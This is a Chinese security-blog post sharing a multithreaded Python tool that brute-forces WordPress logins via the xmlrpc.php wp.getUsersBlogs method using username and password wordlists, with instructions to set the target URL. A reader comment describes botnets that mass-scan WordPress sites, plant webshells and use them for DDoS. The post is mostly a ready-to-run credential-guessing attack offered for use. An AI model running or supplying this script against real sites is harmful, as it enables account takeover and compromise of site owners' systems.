WordPress xmlrpc利用测试工具多线程版

2014-08-04 +3 193279人围观 ,发现 13 个不明物体 工具

看了qingxp9写的代码,修改成一个多线程版本。

漏洞原理请看:http://www.freebuf.com/articles/web/38861.html

以下是代码 

import futures
import requests
from Queue import Queue

XML_URL = "http://www.freebuf.com/xmlrpc.php"
USER_FILE = "username.txt"
PASS_FILE = "password.txt"
THREAD_NUM = 20

data = """<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>%s</value></param><param><value>%s</value></param></params></methodCall>"""
task = Queue()


def attack():
    while not task.empty():
        username = task.get()
        pass_txt = open(PASS_FILE)
        for password in pass_txt:
            req = requests.post(XML_URL, data=data % (username, password.rstrip("\n")))
            if &#039;isadmin&#039; in req.text:
                print "[+] username = " + username + " password = " + password
                break
        print "[-] username %s finished" % username


def main():
    user_txt = open(USER_FILE)
    for username in user_txt:
        task.put(username.rstrip("\n"))
    executor = futures.ThreadPoolExecutor(max_workers=THREAD_NUM)
    for i in range(THREAD_NUM):
        executor.submit(attack)
    executor.shutdown()

if __name__ == "__main__":
    main()

需要手工修改xmlrpc.php地址,准备字典username.txt和password.txt

GIST地址:

https://gist.github.com/sipcer/cf2b4e56fe28835c3ceb

抛砖引玉,大牛速来

这些评论亮了

  • anlfi (5级) 回复
    思维略有点局限 为何要本机多线程呢 国外已经开发了 wp蠕虫 B/S架构
    pwn功能 批量爬站 或者B端下发url目标
    几百个webshell 集群就开始通过远程字典批量扫了
    之后得到的webshell 用来DDOS 或者做又一个节点
    是什么工具我就不说了吧
    各种个人博客被利用DDOS 的报告那么多原因就在这里
    原理类似bugscan python 远程下发
    不支持python的 就会像菜刀一样 发送一个扫描脚本批量执行
    国外的shell盒子 管理已经趋向于群化管理 我觉得是个新方向
    )20( 亮了
发表评论

已有 13 条评论

取消
Loading...
css.php